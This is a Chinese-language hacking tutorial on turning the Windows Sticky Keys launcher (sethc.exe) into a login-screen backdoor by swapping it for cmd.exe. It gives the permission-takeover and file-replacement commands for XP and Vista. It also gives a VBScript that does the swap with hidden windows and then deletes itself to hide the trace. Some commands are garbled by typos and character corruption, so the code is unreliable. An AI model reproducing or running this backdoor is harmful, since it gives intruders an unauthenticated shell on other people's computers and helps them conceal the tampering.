粘滯鍵打造入侵Vista系統(tǒng)爆酷后門

什么是粘滯鍵?
    當你在Windows操作系統(tǒng)里面連續(xù)按下5次Shift鍵之后，你看看出來了什么?
    在windows 2000/xp/Vista下，按shift鍵5次，可以打開粘置，會運行sethc.exe，而且，在登錄界面里也可以打開。這就讓人聯(lián)想到WINDOWS的屏保，將程序替換成cmd.exe后，就可以打開shell了。
    一、具體的替換方法：
    XP系統(tǒng)：
    將安裝源光盤彈出(或?qū)⒂脖P上的安裝目錄改名)　　 cd %widnir%\system32\dllcache
    ren sethc.exe *.ex~
    cd %widnir%\system32
    copy /y cmd.exe sethc.exe
    Vista系統(tǒng)： takeown /f c:\windows\system32\sethc.exe
    cacls c:\windows\system32\sethc.exe /G administrator:F
    上兩步為獲得權(quán)限的命令，你也可以通過Vista優(yōu)化大師獲得右鍵菜單的提升權(quán)限的功能，然后在sethc.exe文件上面右鍵直接提升權(quán)限。
    然后按XP方法替換文件
    在登錄界面按5此SHIFT，出來cmd shell，然后……
    二、后門擴展：　 Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
    success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
    success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
    success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
    第二句最有意思了，自動應答....以前就遇到過類似的問題
    再更新，加個自刪除、簡化代碼：　　 On Error Resume Next
    Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
    CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)